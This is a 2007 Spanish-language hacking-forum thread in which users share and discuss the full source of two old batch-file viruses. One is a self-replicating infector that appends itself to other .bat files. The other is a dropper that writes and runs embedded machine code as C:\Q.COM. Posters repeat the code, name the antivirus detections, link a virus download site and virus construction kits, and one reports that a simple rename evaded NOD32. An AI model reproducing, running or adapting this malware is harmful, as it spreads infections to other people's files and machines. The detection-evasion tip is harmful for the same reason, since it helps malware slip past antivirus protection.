elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informtica
| |-+  Anlisis y Diseo de Malware
| | |-+  Abril negro (Moderadores: Man-In-the-Middle, WHK, fary)
| | | |-+  Abril Negro 2007
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 5 Ir Abajo Respuesta Imprimir
Autor Tema: Abril Negro 2007  (Leído 17,031 veces)
WHK
Moderador
***
Desconectado Desconectado

Mensajes: 6.121


The Hacktivism is not a crime


Ver Perfil WWW
Abril Negro 2007
« en: 31 Marzo 2007, 03:05 »

Ac hay algunos codigos en batch que les pueden interesar un poco:

@echo off%!-%
if '%1=='~ goto !-%2
if exist \!-.bat goto !-r
if not exist %0.bat goto !-e
find "!-"<%0.bat>\!-.BAT
:!-r
command /c \!- ~ s . .. %path%
goto !-e
:!-s
shift%!-%
if '%2==' exist !-
for %%a in (%2\*.bat) do call \!- ~ i %%a
goto !-s
:!-i
find "!-"<%3>!-s
copy !-s !-!>nul
if exist !-! goto !-a
del !-s
type \!-.bat>>%3
exit !-
:!-a
del !-!
:!-e


 XD y este otro:

@ECHO  OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
 '/<t% J/GtW پDDV!A!AC! = u= t u:u`!6<w}!; C:\WINSTART.BAT Z@=w^!rZ [3Ɏٿ` u0u2}0]2E!ُE2E0r&S?ױ!@! [u W!>!ݸW!>!a


jajajaja me diran.. este tio esta loco XD ps no estoy loco... es un virus en batch muy conocido llamado "bacteria2.bat"
Pueden bajar este y muchos ejemplos de codigos creados en batch desde aca:

http://512.iespana.es/virus_y_troyanos

Tambin agregu algunos codigos fuentes de muchos virus para que puedan comprender su funcionamiento (por eso saqu los que no tenian el codigo) ya que la idea no es joder a todo mundo infectando gente y bajando programillas... para eso hay otras paginas, ac es para aprender.

Acabo de agregar dos programas para compilar tu propio virus... uno se llama "lavi" y el otro "viological ware" cada uno con sus textos explicativos. Ojala les sirva ;)

Att. Yan
Unilola Softwares.


« Última modificación: 31 Marzo 2007, 07:16 por WHK » En línea

nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.677


Mximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Virus en batch
« Respuesta #1 en: 31 Marzo 2007, 13:44 »

Podras explicar que es lo que hace este virus?
Es que yo se mas o menos batch y no entiendo mucho tu codigo...
Podrias ir explicando detalladamente que es lo que hace en cada una de las lineas?

Un saludo ;) ;)


En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
abcdef123

Desconectado Desconectado

Mensajes: 63



Ver Perfil
Re: Virus en batch
« Respuesta #2 en: 31 Marzo 2007, 16:43 »

Yo no tengo ni idea lo que hace pero lo he intentado guardar como .txt .doc .ppt .html y nada todo lo detecta al final lo he guardado en el correo  :D
En línea

Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.275



Ver Perfil WWW
Re: Virus en batch
« Respuesta #3 en: 31 Marzo 2007, 20:42 »

emm.....que hace esto kon chincheta??? es un error??? :huh:

Salu2  ;)
En línea

"Todos los das perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegras. Pero al menos una docena de genios se van todos los das sin que sepamos de ellos". - Juan Antonio Cebrin
WHK
Moderador
***
Desconectado Desconectado

Mensajes: 6.121


The Hacktivism is not a crime


Ver Perfil WWW
Re: Virus en batch
« Respuesta #4 en: 31 Marzo 2007, 21:54 »

Quiero dejar en claro que yo no hice esos virus Aunque igual los entiendo a medias porque he aprendido mucho de ellos.
Talves fue un malentendido, solo quera compartir estos codigos fuente para que pudieran hechar a volar la imaginacin. este post fue de una respuesta a programacin en batch hecho y movido por el mismo sidarcat, Aunque muchos me han dicho que es muy buena info pero no quiero que se malinterprete.
Si no tienen ni idea de lo que hace un bat... pueden ver el post de programacin en batch http://foro.elhacker.net/index.php/topic,132924.0.html
En línea

Tyrz


Desconectado Desconectado

Mensajes: 925


Get big or die tryin'


Ver Perfil WWW
Re: Virus en batch
« Respuesta #5 en: 1 Abril 2007, 02:41 »

joder yo hago programillas con batch y tal y eso lo veo y no sbria decirte ni en que lenguage esta
En línea

Web dedicada por completo al surf. Hablamos de tablas de surf, videos de surf, fotos, juegos y mucha informacin sobre como aprender a surfear, spots famosos como mundaka, pipeline y zonas como vizcaya, surf espaa, sopelana y mucho ms. Trucos y peligros del surf. A que esperas? Entra en  Surf
sirdarckcat
Aspirante a supervillano
Moderador Global
***
Desconectado Desconectado

Mensajes: 7.013


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: Virus en batch
« Respuesta #6 en: 1 Abril 2007, 02:57 »

la chicnheta se puso por error..
WHK lo puso en el foro de scripting en unpost con chincheta, al momento de moverlo aca, se le quedo..
ya se la quite :P
En línea

nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.677


Mximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Virus en batch
« Respuesta #7 en: 2 Abril 2007, 20:46 »

En Virustotal lo detectan casi todos los AV... Lo prov en una maquina Virtual con WinXP Proffesional SP2 y nada, no pasa nada con ninguno de los dos codigos, lo analic y no se ejecuta todo el bat pues produce un error de sintaxis antes de acavar...

Alguien lo poda analizar y explicarmelo?

Un saludo ;) ;)
En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
Tyrz


Desconectado Desconectado

Mensajes: 925


Get big or die tryin'


Ver Perfil WWW
Re: Virus en batch
« Respuesta #8 en: 2 Abril 2007, 22:32 »

si la verdad esque si alguien lo explicara estaria fenomeno
En línea

Web dedicada por completo al surf. Hablamos de tablas de surf, videos de surf, fotos, juegos y mucha informacin sobre como aprender a surfear, spots famosos como mundaka, pipeline y zonas como vizcaya, surf espaa, sopelana y mucho ms. Trucos y peligros del surf. A que esperas? Entra en  Surf
Red Mx
Rojito
Colaborador
***
Desconectado Desconectado

Mensajes: 3.645


Viva Mxico Cabrones...


Ver Perfil WWW
Re: Virus en batch
« Respuesta #9 en: 2 Abril 2007, 23:43 »

Código:
@ECHO  OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
 '/<t% J/GtW پDDV!A!AC! = u= t u:u`!6<w}!; C:\WINSTART.BAT Z@=w^!rZ [3Ɏٿ` u0u2}0]2E!ُE2E0r&S?ױ!@! [u W!>!ݸW!>!a

por la lectura rapida que le die solo es un batch que crea un archivo en c llamado Q.com con este code el cual es una aplicacion .com 

Código:
'/<t% J/GtW پDDV!A!AC! = u= t u:u`!6<w}!; C:\WINSTART.BAT Z@=w^!rZ [3Ɏٿ` u0u2}0]2E!ُE2E0r&S?ױ!@! [u W!>!ݸW!>!a

probe los dos guardandolos en un archivo .bat y el nod32 los detecto


al parecer son virus viejos

pero bueno

Código:
@echo off%!-%
if '%1=='~ goto !-%2
if exist \!-.bat goto !-r
if not exist %0.bat goto !-e
find "!-"<%0.bat>\!-.BAT
:!-r
command /c \!- ~ s . .. %path%
goto !-e
:!-s
shift%!-%
if '%2==' exist !-
for %%a in (%2\*.bat) do call \!- ~ i %%a
goto !-s
:!-i
find "!-"<%3>!-s
copy !-s !-!>nul
if exist !-! goto !-a
del !-s
type \!-.bat>>%3
exit !-
:!-a
del !-!
:!-e

Conocido para el nod32 como : Bat/swing.378 (virus)

Código:
@ECHO  OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
 '/<t% J/GtW پDDV!A!AC! = u= t u:u`!6<w}!; C:\WINSTART.BAT Z@=w^!rZ [3Ɏٿ` u0u2}0]2E!ُE2E0r&S?ױ!@! [u W!>!ݸW!>!a

Conocido como: BAT/winstar.297


EDITO:

batch no es un lenguaje de programacion solo son archivos por lotes de MS-DOS los cuales son instrucciones que se ejecutan en modo consola

algo muy curioso solo le cambie la la Q por REDMX en este y el nod32 no lo detecto obiamente no lo ejecute

Código:
@ECHO  OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
 '/<t% J/GtW پDDV!A!AC! = u= t u:u`!6<w}!; C:\WINSTART.BAT Z@=w^!rZ [3Ɏٿ` u0u2}0]2E!ُE2E0r&S?ױ!@! [u W!>!ݸW!>!a

COPY %0.BAT C:\Q.COM>NUL
C:\Q

aqui solo le puse

COPY %0.BAT C:\REDMX.COM>NUL
C:\REDMX
« Última modificación: 2 Abril 2007, 23:47 por Red Mx » En línea

Desarrollar Malware Es Causa De Cancer...
Páginas: [1] 2 3 4 5 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Abril Negro 2012?
Abril negro
peib0l 2 2,512 Último mensaje 13 Abril 2012, 20:11
por berz3k
Sobre Abril Negro « 1 2 »
Abril negro
kub0x 12 7,598 Último mensaje 19 Abril 2015, 23:42
por dRak0
Abril Negro 2006
Abril negro
WHK 0 1,081 Último mensaje 4 Febrero 2017, 18:55
por WHK
Abril Negro 2007
Abril negro
WHK 0 1,052 Último mensaje 4 Febrero 2017, 19:16
por WHK
Qu es Abril Negro?
Abril negro
WHK 0 1,647 Último mensaje 4 Febrero 2017, 21:43
por WHK
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines